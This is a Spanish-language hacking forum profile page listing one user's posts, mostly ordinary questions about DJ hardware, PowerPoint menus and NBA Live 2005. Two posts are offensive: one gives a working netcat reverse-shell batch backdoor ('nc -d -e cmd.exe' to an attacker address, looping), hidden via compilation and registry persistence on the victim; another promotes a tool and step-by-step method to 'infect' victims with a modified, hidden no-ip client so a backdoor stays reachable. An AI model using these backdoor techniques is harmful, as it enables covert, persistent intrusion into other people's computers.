elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Temas
Páginas: [1]
1  Media / Multimedia / mezclar con 3 canales en virtual dj? en: 6 Marzo 2009, 10:40 am
Hola,

Tengo una numark total control y una tarjeta DjYo que utilizo para mezclar con el virtual dj.

Pero para mezclar algunos temas necesito poner una base entre las 2 porque sino es imposible.

El problema es que solo tiene 2 canales y no se como añadi la base sin quitar uno de los 2 temas a mezclar.

Ayuda porfavor, existe vdj con 3 canales? o alguna solucion?

Gracias!!
2  Media / Multimedia / como crear menu para enlazar video con powerpoint en: 21 Marzo 2008, 12:39 pm
Bueno he echo un powerpoint para reproducirlo en una fiesta con un canón. Pero la primera parte antes de el power es un video.

Como o con que programa puedo hacer un menú para seleccionar si abrir el power o la película? Porque se trata de repartir CDs a los invitados y que lo puedan reproducir comodamente en su pc.

Gracias
3  Media / Multimedia / Problema con Numark TotalControl [solucionado] en: 14 Octubre 2007, 16:17 pm
Bueno ayer compre la consola y el Djio. (Total control= 190€, DjIO= 80€)

El DjIo no me dio problemas para instalarlo, y ya lo tengo enxufado al ampli y a los cascos y va realmente bien.

Pero con la Total Control estoy teniendo muchos problemas:

Primero no me la detectava por culpa de los drivers de la logitech quick cam. Al final pude cargarme los controladores de la cam (me quedado sin cam), pero al conectar la mesa no me la detectava. Y es un plug-and-play y no trae drivers el cd.
Bueno instalo el software Cue que viene con la mesa (por cierto el programa viene limitado y no me deja grabar y el virtual dj no funciona con la mesa) configuro como dice en el manual y parece que la coge porque se encienden las luzesitas de la mesa. Ok empiezo a tocar y pareze que todo bien. Pongo un tema y a la que toco un poco los faders o lo que sea la mesa se empieza a encallar el sonido, se para i buelve.. imposible mezclar!

Que puedo hacer? nose si sera el controlador de la mesa (usbccgp.sys) o que pero me esta cabreando porque no xuta.
4  Media / Multimedia / Numark TotalControl o Hercules MK2?????? en: 9 Octubre 2007, 18:24 pm
Bueno pues estaba decidido a comprarme la hercules mk2 pero he visto en la web de virtual dj la numark TotalControl que esta muy wapa esteticamente y vale igual que la hercules.

Cual me recomiendan? Cual tiene mas funciones?


gracias
5  Seguridad Informática / Hacking / Backdoor reverse shell con netcat en: 1 Enero 2007, 23:04 pm
Bueno posteo mi forma de dejar un backdoor reverse shell:

Creo el siguiente bat:

Código:
@echo off
:svr
nc -d -e cmd.exe x.x.x.x 3333>nul
ping -n 60 localhost>nul
goto svr

Si ejecuto el siguiente bat intentara la conexion a x.x.x.x aproximadamente cada minuto creando un bucle infinito.
(Podemos quitar la linea del ping para que intente la conexion infinitamente).

El problema de la ejecución de este backdoor es el cuadro de dialogo de secuencia de comandos. Para poder ocultarlo compilamos el bat con quick batch file compiler triando la opcion ghost application para que oculte el cuadro.
Finalmente añadimos el exe en el registro de la victima y con tansolo poner en nuestra shell: nc -vv -l -p 3333 obtendremos su shell, y si cerramos la conexion la podremos volver a obtener del mismo metodo.

Nose si alguien ya utilizo este metodo.. yo solo he visto utilizar backdoors revere shell con comandos at. Bueno espero que sirva igual.
6  Seguridad Informática / Hacking / NO-IP VICTIM CREATOR 1.0 !!!! Olvidandonos de las IPs dinamicas en: 14 Marzo 2006, 00:57 am
NO-IP VICTIM CREATOR 1.0 By SkilleD
[/size]

Descargar el programa desde

http://www.hack-learn.net/web/download.php?view.76


Para los que se preguntan como dejar una puerta trasera en una maquina con ip dinamica (sin conexiones inversas).    ;D


Este programa es para facilitar la  tarea de "infectar" a la victima con el DUC de no-ip modificado.

Puedes tirar dos metodos, infeccion por bat o por reg



La infeccion por reg es mas segura, pero el batch mucho mas comodo y facil.

Mediante reg lo que haces es crear un archivo reg con las claves necesarias
para el duc de la victima. Y para su infeccion deberás ejecutar o que ejecuten
el reg y el DUC.

Mediante batch tiene más opciones:

Una vez incluidas las claves en el registro puedes descargar el DUC desde
tu ftp o pasarlo via tftp. Y al ejecutar, todo el proceso automatizado.

El no-ip victim creator lo que hace es crear este bat / reg.



INSTRUCCIONES:
[/b]

- Obtener cuenta en no-ip.com y crear un host para la victima. (Pueden
mirar el tutorial en la selección descargas HL papers)

- Descargar DUC20.exe desde no-ip.com e iniciar sesion con la cuenta victima
(para el password cifrado)

- abrir el no-ip victim creator y indicar la info

- Si as triado batch y deseas que descargue de ftp / tftp Debes subir el archivo
en un servidor ftp o usar un servidor tftp. ( El duc que se debe ejecutar
en el pc victima es el duc modificado, el que viene junto al programa.

- Para finalizar hacer que la victima ejecute el batch o obtener shell y suvir
reg y duc por separado etz..



INCLUYE
[/b]

- El duc20 modificado para no mostrar el tryicon

- No-ip victim creator 1.0



NOTAS IMPORTANTES:
[/b]

- Cuando te pide nombres no indicar la extension. Pr ejemplo, te
pide el nombre de tu DUC20 pues si no esta modificado pones DUC20 pero no
DUC20.exe


- Si utilizas tftp o ftp si la victima no tiene permisos y indicas que descargue a system32 habra error.

- Tftp utiliza el puerto 69, UDP.. abrir puerto en cortafuegos de routers etz..

- Si al poner un dato te equivocas puedes editar el batch con el bloc de notas y modificar la info



- Si obtas por tftp Debes tener un servidor tftp como tftp32

y poner a servir la carpeta que contiene el DUC20.exe


Descargar el programa desde

http://www.hack-learn.net/web/download.php?view.76

Qualquier duda o fallo postead o email  ;)

SaluDOS  ;)

Att. SkilleD Programado para hack-learn.net
7  Media / Juegos y Consolas / nba live 2005 en: 17 Marzo 2005, 06:13 am
OLA ;)

Tengo el NBA LIVE 2005 por pc pero en el concurso de mates no se como se hazen los alley oops ( lanzar la pelota i cojerla al aire i machacar) no consego encontrar los comandos!!

Alguien sabes los comandos para hacerlo ?

gracias :)
8  Media / Diseño Gráfico / Aprender html con flax en: 11 Marzo 2005, 08:26 am
Ace tiempo empece un curso html con animaciones flax por enternet que te decia i te mostrava todo sobre este lenguaje paso a paso.

Ahora quiero retomar el curso pero no se donde lo encontre.

Alguien sabe donde estan estos cursos??

GRACIAS ;)

skilled
9  Media / Juegos y Consolas / problema con NBA LIVE 2005 en: 10 Marzo 2005, 02:46 am
me he bajado el nba live 2005 por el ordenador i e grabado las imagenes mdf pero quando lo he instalado i boy a jugar se me queda parado en la ventana inicial i no continua.

alguien sabe PORQUE?

GRACIASSSSSSSS ;)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines